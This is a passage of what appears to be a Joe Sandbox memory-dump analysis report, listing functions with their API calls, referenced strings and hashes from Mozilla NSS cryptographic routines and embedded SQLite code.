__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C5942AB
__allrem.LIBCMT ref: 6C5942B7

Strings

%02d, xrefs: 6C594086
%lld, xrefs: 6C593FB2
%04d, xrefs: 6C59407B
%03d, xrefs: 6C5942E8

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
String ID: %02d$%03d$%04d$%lld
API String ID: 703928654-3678606288
Opcode ID: 0543bbd75aef3eff62525485ee1ab28a23f6f61ab8af430c55fd9b5096647241
Instruction ID: c080f5765a5865ec15aa4b80a7f5fe7859a976d15f88767c0982546c078fbcf8
Opcode Fuzzy Hash: 0543bbd75aef3eff62525485ee1ab28a23f6f61ab8af430c55fd9b5096647241
Instruction Fuzzy Hash: 55F12271A087809FD715CF38CC80A6BB7F6AFC6308F148A6DF49A97651E734D8858B46

Function 6C59EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C59EF63

Part of subcall function 6C5A87D0: PORT_NewArena_Util.NSS3(00000800,6C59EF74,00000000), ref: 6C5A87E8
Part of subcall function 6C5A87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C59EF74,00000000), ref: 6C5A87FD
Part of subcall function 6C5A87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C5A884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C59F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C59F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C59F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C59F374
PL_strcasecmp.NSS3(6C6E2FD4,?), ref: 6C59F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C59F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C59F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C59F67D
CERT_DestroyName.NSS3(?), ref: 6C59F68B

Part of subcall function 6C5A8320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C5A8338
Part of subcall function 6C5A8320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C5A8364
Part of subcall function 6C5A8320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C5A838E
Part of subcall function 6C5A8320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5A83A5
Part of subcall function 6C5A8320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5A83E3

Part of subcall function 6C5A84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C5A84D9
Part of subcall function 6C5A84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C5A8528

Part of subcall function 6C5A8900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C59F599,?,00000000), ref: 6C5A8955

Strings

", xrefs: 6C59F21B
*, xrefs: 6C59F3C6
oid., xrefs: 6C59F2CF

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: 0b44f056a4be2a6139e390fd3d9e9c5c830c8c9dfbf368bccd8b92fe2100a9d7
Instruction ID: f9d1a6fd7286f3e6a523ef250c9a931bbf901576d6bed807dd13a2c724759390
Opcode Fuzzy Hash: 0b44f056a4be2a6139e390fd3d9e9c5c830c8c9dfbf368bccd8b92fe2100a9d7
Instruction Fuzzy Hash: 3E2236716083818BD714CE29DC9036AB7E6ABC531CF184BAEF49987B91E7359C45CB83

Function 6C541C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C541D58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C541EFD
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C541FB7

Strings

no more rows available, xrefs: 6C542264
table, xrefs: 6C541C8B
sqlite_master, xrefs: 6C541C61
sqlite_temp_master, xrefs: 6C541C5C
another row available, xrefs: 6C542287
unknown error, xrefs: 6C542291
attached databases must use the same text encoding as main database, xrefs: 6C5420CA
abort due to ROLLBACK, xrefs: 6C542223
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C541F83
unsupported file format, xrefs: 6C542188

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 563213449-2102270813
Opcode ID: 40e88a868aef6974a325a0c42c7efdb1a27fbd3056f88bab843a9532bd6bacb9
Instruction ID: 8e8bd3bf88c820cd0e7a19bfb5152a6a8878ea0561b4c4f771fdecc4dc8b895b
Opcode Fuzzy Hash: 40e88a868aef6974a325a0c42c7efdb1a27fbd3056f88bab843a9532bd6bacb9
Instruction Fuzzy Hash: 1412CD706083519FD704CF19C884A5ABBF2BF85318F18C96DE8898BB52D771EC56CB92

Function 6C565F20 Relevance: 22.5, APIs: 5, Strings: 8, Instructions: 3043COMMON

Download Yara Rule

Strings

-, xrefs: 6C566228
ON clause references tables to its right, xrefs: 6C566BEC
BINARY, xrefs: 6C568708, 6C568737, 6C5687B8
-, xrefs: 6C5662F9
2, xrefs: 6C5665B4
NOCASE, xrefs: 6C568703
u, xrefs: 6C5681DA
sub-select returns %d columns - expected %d, xrefs: 6C56805F

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID: -$-$2$BINARY$NOCASE$ON clause references tables to its right$sub-select returns %d columns - expected %d$u
API String ID: 0-3593521594
Opcode ID: 3fe983f264cfc11a6a8f9a6daf9417eb76773c04552acd3e8700af72208ba0a9
Instruction ID: b602a4dd67f2f0dfeaa69c4972fd61a075b94f451d7c7ebe291cbe767e1c1bd1
Opcode Fuzzy Hash: 3fe983f264cfc11a6a8f9a6daf9417eb76773c04552acd3e8700af72208ba0a9
Instruction Fuzzy Hash: 9A4364746083419FD304CF26C890B5AB7E2BFC9358F148A5DE8958BB66D731EC46CB92

Function 6C60EFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C60C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C60DAE2,?), ref: 6C60C6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C60F0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C60F0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C60F101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C60F11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C6D218C), ref: 6C60F183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C60F19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C60F1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C60F1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C60F210

Part of subcall function 6C5B52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C60F1E9,?,00000000,?,?), ref: 6C5B52F5
Part of subcall function 6C5B52D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C5B530F
Part of subcall function 6C5B52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C5B5326
Part of subcall function 6C5B52D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C60F1E9,?,00000000,?,?), ref: 6C5B5340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C60F227

Part of subcall function 6C5FFAB0: free.MOZGLUE(?,-00000001,?,?,6C59F673,00000000,00000000), ref: 6C5FFAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C60F23E

Part of subcall function 6C5FBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C5AE708,00000000,00000000,00000004,00000000), ref: 6C5FBE6A
Part of subcall function 6C5FBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5B04DC,?), ref: 6C5FBE7E
Part of subcall function 6C5FBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C5FBEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C60F2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C60F3A8

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C60F3B3

Part of subcall function 6C5B2D20: PK11_DestroyObject.NSS3(?,?), ref: 6C5B2D3C
Part of subcall function 6C5B2D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C5B2D5F

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 2183edddb30c82c963286b28c0cfe677f8e8140412c028d0ac10876c31821453
Instruction ID: 5cedec4a4ada24e78d4339960c3f5f8623a69dfaf822fdc026f0fc5d157172c3
Opcode Fuzzy Hash: 2183edddb30c82c963286b28c0cfe677f8e8140412c028d0ac10876c31821453
Instruction Fuzzy Hash: EDD1A0B5F006059FDB08CF99D980A9EB7F5EF88318F148029DA15B7711EB31E806CB99

Function 6C63DE10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332threadCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6C617FFA,00000000,?,6C6423B9,00000002,00000000,?,6C617FFA,00000002), ref: 6C63DE33

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

Part of subcall function 6C63D000: PORT_ZAlloc_Util.NSS3(00000108,?,6C63DE74,6C617FFA,00000002,?,?,?,?,?,00000000,6C617FFA,00000000,?,6C6423B9,00000002), ref: 6C63D008

PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6C617FFA,00000000,?,6C6423B9,00000002,00000000,?,6C617FFA,00000002), ref: 6C63DE57
memset.VCRUNTIME140(?,00000000,00000088), ref: 6C63DEA5
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C63E069
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C63E121
PK11_FreeSymKey.NSS3(?), ref: 6C63E14F
PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6C63E195
PR_GetCurrentThread.NSS3 ref: 6C63E1FC

Part of subcall function 6C632460: PR_SetError.NSS3(FFFFE005,00000000,6C6D7379,00000002,?), ref: 6C632493

Strings

application data, xrefs: 6C63DFE0
key, xrefs: 6C63E046
handshake data, xrefs: 6C63DFF7
early application data, xrefs: 6C63DFC9

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
String ID: application data$early application data$handshake data$key
API String ID: 1461918828-2699248424
Opcode ID: ecf189566ddae61394a222435dddee2a842f516a306e9e65d301029d2c5e32c9
Instruction ID: 2fcf495268ebbb176f30dbcba2c1ecb99de99c7a811cf18c5c63992254053c65
Opcode Fuzzy Hash: ecf189566ddae61394a222435dddee2a842f516a306e9e65d301029d2c5e32c9
Instruction Fuzzy Hash: 71C1E571A002259BDB04CF65CC80BEAB7B5FF45308F046129E9099BB91E735ED54CBAA

Function 6C52ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C52ED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C52EE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C52EF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C52EF98

Strings

%s at line %d of [%.10s], xrefs: 6C52F492
database corruption, xrefs: 6C52F48D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C52F483

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: 17deaece61084c2bfb5ecf51b3f11b93377a8d37a4992f0b3116757d527f764f
Instruction ID: 7a8839665b31325c4fa8360a2c652840cd20be22eabca4396f323d81c63c10b7
Opcode Fuzzy Hash: 17deaece61084c2bfb5ecf51b3f11b93377a8d37a4992f0b3116757d527f764f
Instruction Fuzzy Hash: 9A62EE70A042558FEB04CF24DC80B9ABBF1AF45318F18469DD8466BBD2D779EC86CB90

Function 6C5CFC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON

Download Yara Rule

APIs

PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6C5CFD06

Part of subcall function 6C5CF670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6C5CF696
Part of subcall function 6C5CF670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6C5CF789
Part of subcall function 6C5CF670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6C5CF796
Part of subcall function 6C5CF670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6C5CF79F
Part of subcall function 6C5CF670: SECITEM_DupItem_Util.NSS3 ref: 6C5CF7F0

Part of subcall function 6C5F3440: PK11_GetAllTokens.NSS3 ref: 6C5F3481
Part of subcall function 6C5F3440: PR_SetError.NSS3(00000000,00000000), ref: 6C5F34A3
Part of subcall function 6C5F3440: TlsGetValue.KERNEL32 ref: 6C5F352E
Part of subcall function 6C5F3440: EnterCriticalSection.KERNEL32(?), ref: 6C5F3542
Part of subcall function 6C5F3440: PR_Unlock.NSS3(?), ref: 6C5F355B

SECITEM_DupItem_Util.NSS3(?), ref: 6C5CFDAD

Part of subcall function 6C5FFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C5A9003,?), ref: 6C5FFD91
Part of subcall function 6C5FFD80: PORT_Alloc_Util.NSS3(A4686C60,?), ref: 6C5FFDA2
Part of subcall function 6C5FFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C60,?,?), ref: 6C5FFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C5CFE00

Part of subcall function 6C5FFD80: free.MOZGLUE(00000000,?,?), ref: 6C5FFDD1

Part of subcall function 6C5EE550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5EE5A0

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5CFEBB
PK11_FreeSymKey.NSS3(00000000), ref: 6C5CFEC8
PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6C5CFED3
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C5CFF0C
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C5CFF23
PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6C5CFF4D
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C5CFFDA
PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6C5D0007
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C5D0029
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C5D0044

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
String ID:
API String ID: 138705723-0
Opcode ID: 802af0e27ec8529a183102b878d5224775349a09bdbaeaf6024d4654d3a6ccd9
Instruction ID: c7a4dfdee0a4e721295974c2303df0d6d322c68f2a09fb8a68e8a56d38bd9f38
Opcode Fuzzy Hash: 802af0e27ec8529a183102b878d5224775349a09bdbaeaf6024d4654d3a6ccd9
Instruction Fuzzy Hash: 15B192B1604301AFE704CF69CC81A6BB7E5FF88308F558A1DE99997A41E770E944CB92

Function 6C5C7D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6C5C7DDC

Part of subcall function 6C6007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C5A8298,?,?,?,6C59FCE5,?), ref: 6C6007BF
Part of subcall function 6C6007B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6007E6
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C60081B
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C600825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C5C7DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C5C7F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6C5C7F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C5C7F98
PK11_FreeSymKey.NSS3(?), ref: 6C5C7FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5C7FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C5C8000

Part of subcall function 6C5E9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C5C7F0C,?,00000000,00000000,00000000,?), ref: 6C5E943B
Part of subcall function 6C5E9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C5E946B
Part of subcall function 6C5E9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C5E9546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5C8110
PK11_FreeSymKey.NSS3(00000000), ref: 6C5C811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C5C822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C5C823C

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: d26d124ccb0a928d9f1358ee2429094df3df91536185291aa0865b752a44e1cc
Instruction ID: 4a79b825a71deeea86d776dad6e0fe2508c6e5ce1b1a95158a5cd1b62b90903c
Opcode Fuzzy Hash: d26d124ccb0a928d9f1358ee2429094df3df91536185291aa0865b752a44e1cc
Instruction Fuzzy Hash: 33C163B1E00259DBDB21CF64CC44BDAB7B8AF05348F0085E9E91DA6A41E7319E85CF52

Function 6C53AEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C65CF46,?,6C52CDBD,?,6C65BF31,?,?,?,?,?,?,?), ref: 6C53B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C65CF46,?,6C52CDBD,?,6C65BF31), ref: 6C53B090
sqlite3_free.NSS3(?,?,?,?,?,?,6C65CF46,?,6C52CDBD,?,6C65BF31), ref: 6C53B0A2
CloseHandle.KERNEL32(?,?,6C65CF46,?,6C52CDBD,?,6C65BF31,?,?,?,?,?,?,?,?,?), ref: 6C53B100
sqlite3_free.NSS3(?,?,00000002,?,6C65CF46,?,6C52CDBD,?,6C65BF31,?,?,?,?,?,?,?), ref: 6C53B115
sqlite3_free.NSS3(?,?,?,?,?,?,6C65CF46,?,6C52CDBD,?,6C65BF31), ref: 6C53B12D

Part of subcall function 6C529EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C53C6FD,?,?,?,?,6C58F965,00000000), ref: 6C529F0E
Part of subcall function 6C529EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C58F965,00000000), ref: 6C529F5D

Strings

`kl, xrefs: 6C53B0DF

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID: `kl
API String ID: 3155957115-1495814759
Opcode ID: 109443c3eb86929bb7a25f0aedfe2f41f8d5debf7202f51ea7619d057cf59555
Instruction ID: 6cb9d159331e53ca40ee6647036d37d4518eaaee9702b450b8d3b7920d9ed17f
Opcode Fuzzy Hash: 109443c3eb86929bb7a25f0aedfe2f41f8d5debf7202f51ea7619d057cf59555
Instruction Fuzzy Hash: 6F91ECB0A006158FEB04DF65DC84B6BB7B2BF46308F145A2DE41A97B50FB35E844CB91

